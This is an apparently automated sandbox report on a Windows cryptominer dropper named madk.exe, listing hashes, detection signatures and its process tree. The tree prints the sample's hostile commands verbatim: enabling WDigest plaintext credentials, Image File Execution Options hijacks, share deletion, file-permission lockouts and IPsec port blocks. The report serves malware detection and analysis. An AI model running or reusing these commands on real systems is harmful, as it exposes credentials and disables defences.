Analysis
-
max time kernel
151s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
22-05-2022 05:35
Static task
static1
Behavioral task
behavioral1
Sample
madk.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
madk.exe
Resource
win10v2004-20220414-en
General
-
Target
madk.exe
-
Size
3.4MB
-
MD5
d00af5991807952929e5b986afd295c9
-
SHA1
7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
-
SHA256
025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
-
SHA512
c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule \Windows\Fonts\rundlls.exe xmrig C:\Windows\Fonts\rundlls.exe xmrig -
Executes dropped EXE 13 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exepid process 2016 svchost.exe 1976 svchost.exe 1040 svchost.exe 364 svchost.exe 1356 svchost.exe 1628 svchost.exe 1236 conhost.exe 2000 svchost.exe 268 svchost.exe 1168 svchost.exe 2016 svchost.exe 1416 svchost.exe 1952 rundlls.exe -
Sets file execution options in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\conhost.exe upx C:\Windows\Fonts\conhost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx \Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx -
Deletes itself 1 IoCs
Processes:
WScript.exepid process 1668 WScript.exe -
Loads dropped DLL 6 IoCs
Processes:
madk.exesvchost.exepid process 916 madk.exe 836 1424 1372 1228 1416 svchost.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exepid process 2012 takeown.exe 1384 takeown.exe 1444 takeown.exe 1724 takeown.exe -
Drops file in Windows directory 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\conhost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\conhost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts\csrss.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\lsass.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\svchost.exe madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 4 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 268 WMIC.exe 948 WMIC.exe 1744 WMIC.exe 1736 WMIC.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1560 taskkill.exe 904 taskkill.exe 1396 taskkill.exe 844 taskkill.exe 1232 taskkill.exe 1568 taskkill.exe 1560 taskkill.exe 1924 taskkill.exe 596 taskkill.exe 1568 taskkill.exe 564 taskkill.exe 836 taskkill.exe 1956 taskkill.exe 1816 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepid process 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe 1236 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 596 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 844 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 904 taskkill.exe Token: SeLockMemoryPrivilege 1952 rundlls.exe Token: SeIncreaseQuotaPrivilege 1736 WMIC.exe Token: SeSecurityPrivilege 1736 WMIC.exe Token: SeTakeOwnershipPrivilege 1736 WMIC.exe Token: SeLoadDriverPrivilege 1736 WMIC.exe Token: SeSystemProfilePrivilege 1736 WMIC.exe Token: SeSystemtimePrivilege 1736 WMIC.exe Token: SeProfSingleProcessPrivilege 1736 WMIC.exe Token: SeIncBasePriorityPrivilege 1736 WMIC.exe Token: SeCreatePagefilePrivilege 1736 WMIC.exe Token: SeBackupPrivilege 1736 WMIC.exe Token: SeRestorePrivilege 1736 WMIC.exe Token: SeShutdownPrivilege 1736 WMIC.exe Token: SeDebugPrivilege 1736 WMIC.exe Token: SeSystemEnvironmentPrivilege 1736 WMIC.exe Token: SeRemoteShutdownPrivilege 1736 WMIC.exe Token: SeUndockPrivilege 1736 WMIC.exe Token: SeManageVolumePrivilege 1736 WMIC.exe Token: 33 1736 WMIC.exe Token: 34 1736 WMIC.exe Token: 35 1736 WMIC.exe Token: SeIncreaseQuotaPrivilege 1736 WMIC.exe Token: SeSecurityPrivilege 1736 WMIC.exe Token: SeTakeOwnershipPrivilege 1736 WMIC.exe Token: SeLoadDriverPrivilege 1736 WMIC.exe Token: SeSystemProfilePrivilege 1736 WMIC.exe Token: SeSystemtimePrivilege 1736 WMIC.exe Token: SeProfSingleProcessPrivilege 1736 WMIC.exe Token: SeIncBasePriorityPrivilege 1736 WMIC.exe Token: SeCreatePagefilePrivilege 1736 WMIC.exe Token: SeBackupPrivilege 1736 WMIC.exe Token: SeRestorePrivilege 1736 WMIC.exe Token: SeShutdownPrivilege 1736 WMIC.exe Token: SeDebugPrivilege 1736 WMIC.exe Token: SeSystemEnvironmentPrivilege 1736 WMIC.exe Token: SeRemoteShutdownPrivilege 1736 WMIC.exe Token: SeUndockPrivilege 1736 WMIC.exe Token: SeManageVolumePrivilege 1736 WMIC.exe Token: 33 1736 WMIC.exe Token: 34 1736 WMIC.exe Token: 35 1736 WMIC.exe Token: SeIncreaseQuotaPrivilege 268 WMIC.exe Token: SeSecurityPrivilege 268 WMIC.exe Token: SeTakeOwnershipPrivilege 268 WMIC.exe Token: SeLoadDriverPrivilege 268 WMIC.exe Token: SeSystemProfilePrivilege 268 WMIC.exe Token: SeSystemtimePrivilege 268 WMIC.exe Token: SeProfSingleProcessPrivilege 268 WMIC.exe Token: SeIncBasePriorityPrivilege 268 WMIC.exe Token: SeCreatePagefilePrivilege 268 WMIC.exe Token: SeBackupPrivilege 268 WMIC.exe Token: SeRestorePrivilege 268 WMIC.exe Token: SeShutdownPrivilege 268 WMIC.exe Token: SeDebugPrivilege 268 WMIC.exe Token: SeSystemEnvironmentPrivilege 268 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundlls.exepid process 1952 rundlls.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
madk.execonhost.exepid process 916 madk.exe 916 madk.exe 1236 conhost.exe 1236 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
madk.execmd.exedescription pid process target process PID 916 wrote to memory of 1720 916 madk.exe cmd.exe PID 916 wrote to memory of 1720 916 madk.exe cmd.exe PID 916 wrote to memory of 1720 916 madk.exe cmd.exe PID 916 wrote to memory of 1720 916 madk.exe cmd.exe PID 916 wrote to memory of 1616 916 madk.exe reg.exe PID 916 wrote to memory of 1616 916 madk.exe reg.exe PID 916 wrote to memory of 1616 916 madk.exe reg.exe PID 916 wrote to memory of 1616 916 madk.exe reg.exe PID 916 wrote to memory of 1680 916 madk.exe reg.exe PID 916 wrote to memory of 1680 916 madk.exe reg.exe PID 916 wrote to memory of 1680 916 madk.exe reg.exe PID 916 wrote to memory of 1680 916 madk.exe reg.exe PID 1720 wrote to memory of 2032 1720 cmd.exe attrib.exe PID 1720 wrote to memory of 2032 1720 cmd.exe attrib.exe PID 1720 wrote to memory of 2032 1720 cmd.exe attrib.exe PID 1720 wrote to memory of 2032 1720 cmd.exe attrib.exe PID 916 wrote to memory of 1228 916 madk.exe reg.exe PID 916 wrote to memory of 1228 916 madk.exe reg.exe PID 916 wrote to memory of 1228 916 madk.exe reg.exe PID 916 wrote to memory of 1228 916 madk.exe reg.exe PID 916 wrote to memory of 2008 916 madk.exe reg.exe PID 916 wrote to memory of 2008 916 madk.exe reg.exe PID 916 wrote to memory of 2008 916 madk.exe reg.exe PID 916 wrote to memory of 2008 916 madk.exe reg.exe PID 916 wrote to memory of 1964 916 madk.exe reg.exe PID 916 wrote to memory of 1964 916 madk.exe reg.exe PID 916 wrote to memory of 1964 916 madk.exe reg.exe PID 916 wrote to memory of 1964 916 madk.exe reg.exe PID 916 wrote to memory of 788 916 madk.exe sc.exe PID 916 wrote to memory of 788 916 madk.exe sc.exe PID 916 wrote to memory of 788 916 madk.exe sc.exe PID 916 wrote to memory of 788 916 madk.exe sc.exe PID 916 wrote to memory of 876 916 madk.exe sc.exe PID 916 wrote to memory of 876 916 madk.exe sc.exe PID 916 wrote to memory of 876 916 madk.exe sc.exe PID 916 wrote to memory of 876 916 madk.exe sc.exe PID 916 wrote to memory of 1204 916 madk.exe sc.exe PID 916 wrote to memory of 1204 916 madk.exe sc.exe PID 916 wrote to memory of 1204 916 madk.exe sc.exe PID 916 wrote to memory of 1204 916 madk.exe sc.exe PID 916 wrote to memory of 1332 916 madk.exe sc.exe PID 916 wrote to memory of 1332 916 madk.exe sc.exe PID 916 wrote to memory of 1332 916 madk.exe sc.exe PID 916 wrote to memory of 1332 916 madk.exe sc.exe PID 916 wrote to memory of 1352 916 madk.exe sc.exe PID 916 wrote to memory of 1352 916 madk.exe sc.exe PID 916 wrote to memory of 1352 916 madk.exe sc.exe PID 916 wrote to memory of 1352 916 madk.exe sc.exe PID 916 wrote to memory of 1936 916 madk.exe sc.exe PID 916 wrote to memory of 1936 916 madk.exe sc.exe PID 916 wrote to memory of 1936 916 madk.exe sc.exe PID 916 wrote to memory of 1936 916 madk.exe sc.exe PID 916 wrote to memory of 976 916 madk.exe sc.exe PID 916 wrote to memory of 976 916 madk.exe sc.exe PID 916 wrote to memory of 976 916 madk.exe sc.exe PID 916 wrote to memory of 976 916 madk.exe sc.exe PID 916 wrote to memory of 1888 916 madk.exe sc.exe PID 916 wrote to memory of 1888 916 madk.exe sc.exe PID 916 wrote to memory of 1888 916 madk.exe sc.exe PID 916 wrote to memory of 1888 916 madk.exe sc.exe PID 916 wrote to memory of 1560 916 madk.exe taskkill.exe PID 916 wrote to memory of 1560 916 madk.exe taskkill.exe PID 916 wrote to memory of 1560 916 madk.exe taskkill.exe PID 916 wrote to memory of 1560 916 madk.exe taskkill.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1380 attrib.exe 1204 attrib.exe 916 attrib.exe 268 attrib.exe 832 attrib.exe 1340 attrib.exe 1084 attrib.exe 2028 attrib.exe 904 attrib.exe 1648 attrib.exe 2028 attrib.exe 948 attrib.exe 1668 attrib.exe 1284 attrib.exe 576 attrib.exe 1496 attrib.exe 832 attrib.exe 1516 attrib.exe 780 attrib.exe 2036 attrib.exe 2044 attrib.exe 1552 attrib.exe 836 attrib.exe 2036 attrib.exe 1104 attrib.exe 1568 attrib.exe 296 attrib.exe 1548 attrib.exe 1228 attrib.exe 336 attrib.exe 2000 attrib.exe 1956 attrib.exe 1872 attrib.exe 960 attrib.exe 336 attrib.exe 1468 attrib.exe 1256 attrib.exe 1828 attrib.exe 576 attrib.exe 972 attrib.exe 1344 attrib.exe 784 attrib.exe 1372 attrib.exe 1948 attrib.exe 1080 attrib.exe 2028 attrib.exe 584 attrib.exe 1736 attrib.exe 1816 attrib.exe 1280 attrib.exe 296 attrib.exe 936 attrib.exe 1616 attrib.exe 1872 attrib.exe 1780 attrib.exe 1424 attrib.exe 1380 attrib.exe 1488 attrib.exe 1676 attrib.exe 1584 attrib.exe 296 attrib.exe 1344 attrib.exe 1168 attrib.exe 836 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\madk.exe"C:\Users\Admin\AppData\Local\Temp\madk.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MetPipAtcivator2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MetPipAtcivator2⤵
-
C:\Windows\SysWOW64\sc.exesc stop SetPipAtcivator2⤵
-
C:\Windows\SysWOW64\sc.exesc delete SetPipAtcivator2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dl1hots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d1lhots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundlls.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del3⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\TEMP\csonhost.bat2⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
-
C:\Windows\SysWOW64\sc.exesc start MetPipAtcivator3⤵
-
C:\Windows\SysWOW64\net.exenet share iPC$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share iPC$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share admin$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share admin$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share c$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share c$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share d$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share d$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share e$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share e$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet share f$ /delete3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 share f$ /delete4⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y4⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED3⤵
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Graphipcs_PerfSvcs3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Graphipcs_PerfSvcs3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop conhost3⤵
-
C:\Windows\SysWOW64\sc.exesc delete conhost3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\conhost.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\conhost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f3⤵
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsars.exe /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\sqlservr.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
